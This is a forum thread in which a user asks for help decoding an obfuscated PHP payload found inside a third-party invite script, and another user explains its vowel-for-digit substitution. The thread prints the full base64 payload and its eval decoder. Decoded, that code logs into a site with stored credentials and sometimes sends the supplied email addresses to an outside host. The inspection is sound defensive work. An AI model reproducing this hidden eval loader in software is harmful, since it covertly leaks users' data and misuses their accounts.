Can Someone Decode This?

[dzhax]

I found a script I want to use, but it entails entering account information for a site. So obviously I am going to look through it and make sure its not a phishing attempt on my info. While I was doing this i found this $_X=''; and what appears to be a base64 encoded string. So I base64 decoded it and it doesn't look right still...The code in the script:

if(isset($_GET['e'])) {	$_F=__FILE__;	$_X='Pz48P3BocA0KZjNuY3Q0Mm4gczVuZEludjR0NSgkNW0xNGxzKSB7DQoJDQoJJG15RjRsNSA9ICJjMjNudC50eHQiOw0KCSRmaCA9IGYycDVuKCRteUY0bDUsICdyJyk7DQoJNGYoZjRsNXM0ejUoJG15RjRsNSkgPT0gMCkgew0KCQkkYzIzbnQgPSAwOw0KCX0gNWxzNSB7DQoJCSRjMjNudCA9IGZyNTFkKCRmaCwgZjRsNXM0ejUoJG15RjRsNSkpOw0KCQlmY2wyczUoJGZoKTsNCgl9DQoJDQoJDQoJNGYoKCgkYzIzbnQgJSBpKSA9PSAwKSAmJiAoJGMyM250ICE9IDApKSB7DQoJCQlyNXQzcm4gZjRsNV9nNXRfYzJudDVudHMoImh0dHA6Ly93d3cuNTFybnB0ei5jMm0vNG52NHQ1LnBocD81PSIuJDVtMTRscyk7DQoJfSA1bHM1IHsNCg0KCQkkMWc1bnQgPSAiTTJ6NGxsMS9pLjAgKE0xYzRudDJzaDsgVTsgSW50NWwgTTFjIE9TIFggNjBfZV82OyA1bi1VUykgQXBwbDVXNWJLNHQvaW9hLmkgKEtIVE1MLCBsNGs1IEc1Y2syKSBDaHIybTUvdS4wLmF1OS51OSBTMWYxcjQvaW9hLmkiOyANCg0KCQkkcDJzdDNybCA9ICJodHRwOi8vd3d3LmwyY2s1cnouYzJtLzEzdGgvbDJnNG4iOyANCgkJJHI1ZjVycjVyID0gImh0dHA6Ly93d3cubDJjazVyei5jMm0iOw0KDQoJCSRwMnN0NHQgPSAxcnIxeSgicjVtNW1iNXJfbTUiID0+ICIybiIsDQoJCQkiaDFuZGw1IiA9PiBMX0xPR0lOLA0KCQkJInAxc3N3MnJkIiA9PiBMX1BBU1NXT1JELA0KCQkpOw0KDQoJCSRjMjJrNDVfZjRsNV9wMXRoID0gImMyMms0NS50eHQiOw0KDQoJCSRjaCA9IGMzcmxfNG40dCgpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfVkVSQk9TRSwgNik7DQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9VUkwsICRwMnN0M3JsKTsNCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX1VTRVJBR0VOVCwgJDFnNW50KTsNCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgNik7DQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9QT1NULCB0cjM1KTsNCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX1BPU1RGSUVMRFMsICRwMnN0NHQpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDYpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIDYpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfTUFYUkVESVJTLCBpMCk7DQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9SRUZFUkVSLCAkcjVmNXJyNXIpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfU1NMX1ZFUklGWVBFRVIsIEZBTFNFKTsNCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX0NPT0tJRUZJTEUsICRjMjJrNDVfZjRsNV9wMXRoKTsNCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX0NPT0tJRUpBUiwgJGMyMms0NV9mNGw1X3AxdGgpOw0KCQkkcjVzM2x0ID0gYzNybF81eDVjKCRjaCk7DQoJCTNuczV0KCRjaCk7DQoNCgkJNGYoc3Ryc3RyKCRyNXMzbHQsICJTNGduMjN0IikgPT0gRkFMU0Upew0KCQkJcjV0M3JuICJkMnduIjsNCgkJfQ0KDQoJCSRwMnN0M3JsID0gImh0dHA6Ly93d3cubDJjazVyei5jMm0vNG52NHQxdDQybi9zNW5kXzVtMTRsXzRudjR0NXMiOyANCgkJJHI1ZjVycjVyID0gImh0dHA6Ly93d3cubDJjazVyei5jMm0vYzJubjVjdCI7DQoNCgkJJHAyc3Q0dCA9IDFycjF5KCI1bTE0bHMiID0+ICIkNW0xNGxzIiwNCgkJCSJtNXNzMWc1IiA9PiBMX01FU1NBR0UNCgkJKTsNCg0KCQkkY2ggPSBjM3JsXzRuNHQoKTsgDQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9WRVJCT1NFLCA2KTsNCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX1VSTCwgJHAyc3QzcmwpOyANCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX1VTRVJBR0VOVCwgJDFnNW50KTsgDQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIDYpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfUE9TVCwgNik7IA0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfUE9TVEZJRUxEUywgJHAyc3Q0dCk7DQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgNik7IA0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIDYpOyANCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX01BWFJFRElSUywgaTApOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfUkVGRVJFUiwgJHI1ZjVycjVyKTsgDQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgRkFMU0UpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfQ09PS0lFRklMRSwgJGMyMms0NV9mNGw1X3AxdGgpOyANCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX0NPT0tJRUpBUiwgJGMyMms0NV9mNGw1X3AxdGgpOyANCgkJJHI1czNsdCA9IGMzcmxfNXg1YygkY2gpOyANCgkJM25zNXQoJGNoKTsgDQoNCgkJNGYoc3Ryc3RyKCRyNXMzbHQsICJzM2NjNXNzIikgPT0gVFJVRSl7DQoJCQkkbXlGNGw1ID0gImMyM250LnR4dCI7DQoJCQkkZmggPSBmMnA1bigkbXlGNGw1LCAndycpIDJyIGQ0NSgiQzFuJ3QgMnA1biBjMjNudC50eHQiKTsNCgkJCSRjMjNudCsrOw0KCQkJJHN0cjRuZ0QxdDEgPSAkYzIzbnQ7DQoJCQlmd3I0dDUoJGZoLCAkc3RyNG5nRDF0MSkgMnIgZDQ1KCJDMW4ndCAzcGQxdDUgYzIzbnQudHh0Iik7DQoJCQlmY2wyczUoJGZoKTsNCgkJCXI1dDNybiAiczVudCI7DQoJCX0gNWxzNSB7DQoJCQlyNXQzcm4gIjFscjUxZHkiOw0KCQl9DQoJfQ0KDQp9DQo/Pg==';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));	$result = sendInvite($_GET['e']);

My attempt to decode:

<? echo base64_decode("Pz48P3BocA0KZjNuY3Q0Mm4gczVuZEludjR0NSgkNW0xNGxzKSB7DQoJDQoJJG15RjRsNSA9ICJjMjNudC50eHQiOw0KCSRmaCA9IGYycDVuKCRteUY0bDUsICdyJyk7DQoJNGYoZjRsNXM0ejUoJG15RjRsNSkgPT0gMCkgew0KCQkkYzIzbnQgPSAwOw0KCX0gNWxzNSB7DQoJCSRjMjNudCA9IGZyNTFkKCRmaCwgZjRsNXM0ejUoJG15RjRsNSkpOw0KCQlmY2wyczUoJGZoKTsNCgl9DQoJDQoJDQoJNGYoKCgkYzIzbnQgJSBpKSA9PSAwKSAmJiAoJGMyM250ICE9IDApKSB7DQoJCQlyNXQzcm4gZjRsNV9nNXRfYzJudDVudHMoImh0dHA6Ly93d3cuNTFybnB0ei5jMm0vNG52NHQ1LnBocD81PSIuJDVtMTRscyk7DQoJfSA1bHM1IHsNCg0KCQkkMWc1bnQgPSAiTTJ6NGxsMS9pLjAgKE0xYzRudDJzaDsgVTsgSW50NWwgTTFjIE9TIFggNjBfZV82OyA1bi1VUykgQXBwbDVXNWJLNHQvaW9hLmkgKEtIVE1MLCBsNGs1IEc1Y2syKSBDaHIybTUvdS4wLmF1OS51OSBTMWYxcjQvaW9hLmkiOyANCg0KCQkkcDJzdDNybCA9ICJodHRwOi8vd3d3LmwyY2s1cnouYzJtLzEzdGgvbDJnNG4iOyANCgkJJHI1ZjVycjVyID0gImh0dHA6Ly93d3cubDJjazVyei5jMm0iOw0KDQoJCSRwMnN0NHQgPSAxcnIxeSgicjVtNW1iNXJfbTUiID0+ICIybiIsDQoJCQkiaDFuZGw1IiA9PiBMX0xPR0lOLA0KCQkJInAxc3N3MnJkIiA9PiBMX1BBU1NXT1JELA0KCQkpOw0KDQoJCSRjMjJrNDVfZjRsNV9wMXRoID0gImMyMms0NS50eHQiOw0KDQoJCSRjaCA9IGMzcmxfNG40dCgpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfVkVSQk9TRSwgNik7DQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9VUkwsICRwMnN0M3JsKTsNCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX1VTRVJBR0VOVCwgJDFnNW50KTsNCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgNik7DQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9QT1NULCB0cjM1KTsNCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX1BPU1RGSUVMRFMsICRwMnN0NHQpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDYpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIDYpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfTUFYUkVESVJTLCBpMCk7DQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9SRUZFUkVSLCAkcjVmNXJyNXIpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfU1NMX1ZFUklGWVBFRVIsIEZBTFNFKTsNCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX0NPT0tJRUZJTEUsICRjMjJrNDVfZjRsNV9wMXRoKTsNCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX0NPT0tJRUpBUiwgJGMyMms0NV9mNGw1X3AxdGgpOw0KCQkkcjVzM2x0ID0gYzNybF81eDVjKCRjaCk7DQoJCTNuczV0KCRjaCk7DQoNCgkJNGYoc3Ryc3RyKCRyNXMzbHQsICJTNGduMjN0IikgPT0gRkFMU0Upew0KCQkJcjV0M3JuICJkMnduIjsNCgkJfQ0KDQoJCSRwMnN0M3JsID0gImh0dHA6Ly93d3cubDJjazVyei5jMm0vNG52NHQxdDQybi9zNW5kXzVtMTRsXzRudjR0NXMiOyANCgkJJHI1ZjVycjVyID0gImh0dHA6Ly93d3cubDJjazVyei5jMm0vYzJubjVjdCI7DQoNCgkJJHAyc3Q0dCA9IDFycjF5KCI1bTE0bHMiID0+ICIkNW0xNGxzIiwNCgkJCSJtNXNzMWc1IiA9PiBMX01FU1NBR0UNCgkJKTsNCg0KCQkkY2ggPSBjM3JsXzRuNHQoKTsgDQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9WRVJCT1NFLCA2KTsNCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX1VSTCwgJHAyc3QzcmwpOyANCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX1VTRVJBR0VOVCwgJDFnNW50KTsgDQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIDYpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfUE9TVCwgNik7IA0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfUE9TVEZJRUxEUywgJHAyc3Q0dCk7DQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgNik7IA0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIDYpOyANCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX01BWFJFRElSUywgaTApOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfUkVGRVJFUiwgJHI1ZjVycjVyKTsgDQoJCWMzcmxfczV0MnB0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgRkFMU0UpOw0KCQljM3JsX3M1dDJwdCgkY2gsIENVUkxPUFRfQ09PS0lFRklMRSwgJGMyMms0NV9mNGw1X3AxdGgpOyANCgkJYzNybF9zNXQycHQoJGNoLCBDVVJMT1BUX0NPT0tJRUpBUiwgJGMyMms0NV9mNGw1X3AxdGgpOyANCgkJJHI1czNsdCA9IGMzcmxfNXg1YygkY2gpOyANCgkJM25zNXQoJGNoKTsgDQoNCgkJNGYoc3Ryc3RyKCRyNXMzbHQsICJzM2NjNXNzIikgPT0gVFJVRSl7DQoJCQkkbXlGNGw1ID0gImMyM250LnR4dCI7DQoJCQkkZmggPSBmMnA1bigkbXlGNGw1LCAndycpIDJyIGQ0NSgiQzFuJ3QgMnA1biBjMjNudC50eHQiKTsNCgkJCSRjMjNudCsrOw0KCQkJJHN0cjRuZ0QxdDEgPSAkYzIzbnQ7DQoJCQlmd3I0dDUoJGZoLCAkc3RyNG5nRDF0MSkgMnIgZDQ1KCJDMW4ndCAzcGQxdDUgYzIzbnQudHh0Iik7DQoJCQlmY2wyczUoJGZoKTsNCgkJCXI1dDNybiAiczVudCI7DQoJCX0gNWxzNSB7DQoJCQlyNXQzcm4gIjFscjUxZHkiOw0KCQl9DQoJfQ0KDQp9DQo/Pg==';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=="); ?>

My Result:

?> "2n", "h1ndl5" => L_LOGIN, "p1ssw2rd" => L_PASSWORD, ); $c22k45_f4l5_p1th = "c22k45.txt"; $ch = c3rl_4n4t(); c3rl_s5t2pt($ch, CURLOPT_VERBOSE, 6); c3rl_s5t2pt($ch, CURLOPT_URL, $p2st3rl); c3rl_s5t2pt($ch, CURLOPT_USERAGENT, $1g5nt); c3rl_s5t2pt($ch, CURLOPT_HEADER, 6); c3rl_s5t2pt($ch, CURLOPT_POST, tr35); c3rl_s5t2pt($ch, CURLOPT_POSTFIELDS, $p2st4t); c3rl_s5t2pt($ch, CURLOPT_RETURNTRANSFER, 6); c3rl_s5t2pt($ch, CURLOPT_FOLLOWLOCATION, 6); c3rl_s5t2pt($ch, CURLOPT_MAXREDIRS, i0); c3rl_s5t2pt($ch, CURLOPT_REFERER, $r5f5rr5r); c3rl_s5t2pt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); c3rl_s5t2pt($ch, CURLOPT_COOKIEFILE, $c22k45_f4l5_p1th); c3rl_s5t2pt($ch, CURLOPT_COOKIEJAR, $c22k45_f4l5_p1th); $r5s3lt = c3rl_5x5c($ch); 3ns5t($ch); 4f(strstr($r5s3lt, "S4gn23t") == FALSE){ r5t3rn "d2wn"; } $p2st3rl = "http://www.l2ck5rz.c2m/4nv4t1t42n/s5nd_5m14l_4nv4t5s"; $r5f5rr5r = "http://www.l2ck5rz.c2m/c2nn5ct"; $p2st4t = 1rr1y("5m14ls" => "$5m14ls", "m5ss1g5" => L_MESSAGE ); $ch = c3rl_4n4t(); c3rl_s5t2pt($ch, CURLOPT_VERBOSE, 6); c3rl_s5t2pt($ch, CURLOPT_URL, $p2st3rl); c3rl_s5t2pt($ch, CURLOPT_USERAGENT, $1g5nt); c3rl_s5t2pt($ch, CURLOPT_HEADER, 6); c3rl_s5t2pt($ch, CURLOPT_POST, 6); c3rl_s5t2pt($ch, CURLOPT_POSTFIELDS, $p2st4t); c3rl_s5t2pt($ch, CURLOPT_RETURNTRANSFER, 6); c3rl_s5t2pt($ch, CURLOPT_FOLLOWLOCATION, 6); c3rl_s5t2pt($ch, CURLOPT_MAXREDIRS, i0); c3rl_s5t2pt($ch, CURLOPT_REFERER, $r5f5rr5r); c3rl_s5t2pt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); c3rl_s5t2pt($ch, CURLOPT_COOKIEFILE, $c22k45_f4l5_p1th); c3rl_s5t2pt($ch, CURLOPT_COOKIEJAR, $c22k45_f4l5_p1th); $r5s3lt = c3rl_5x5c($ch); 3ns5t($ch); 4f(strstr($r5s3lt, "s3cc5ss") == TRUE){ $myF4l5 = "c23nt.txt"; $fh = f2p5n($myF4l5, 'w') 2r d45("C1n't 2p5n c23nt.txt"); $c23nt++; $str4ngD1t1 = $c23nt; fwr4t5($fh, $str4ngD1t1) 2r d45("C1n't 3pd1t5 c23nt.txt"); fcl2s5($fh); r5t3rn "s5nt"; } 5ls5 { r5t3rn "1lr51dy"; } } } ?>¯jVÚ±î¸uç(uâEõƒÖ&6ScEöFV6öFR‚Eõ‚“²Eõƒ×7G'G"‚Eõ‚Âs#3CSf÷V–RrÂv÷V–S#3CSbr“²Eõ#ÖW&Vu÷&WÆ6R‚uõôd”ÄUõòrÂ"r"âEôbâ"r"ÂEõ‚“¶Wf‚Eõ"“²Eõ#Ó²EõƒÓ°

The majority of it is readable but the very end and what appears to be random number replacement....I didn't even see anywhere in the script that is decoding...Any help appreciated.EDIT: On second thought after looking at my post just now i notices a decode at the end of that long line... lets see what that says :)OK found out that that last line of gibberish was a decode statment tacked on the end of the line.

$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;

[justsomeguy]

What exactly are you looking for help with?It looks like just character replacement. You can see here:p1ssw2rdthat 1=a and 2=o. So you could substitute that in here:c22k45_f4l5_p1thto get:cook45_f4l5_pathI'm going to guess that 4=i and 5=e, to give "cookie_file_path".I know that this is curl_init:$ch = c3rl_4n4t();So then 3=u.So apparently they replaced the vowels with 1-5. You can go through that code and replace everything yourself if you want to see it. There's a second eval on the bottom of what you decoded, make sure you echo that also.

[dzhax]

Yea I just figured that out...It was that decode at the end i didnt see.I got it working now.Thanks for your help anyway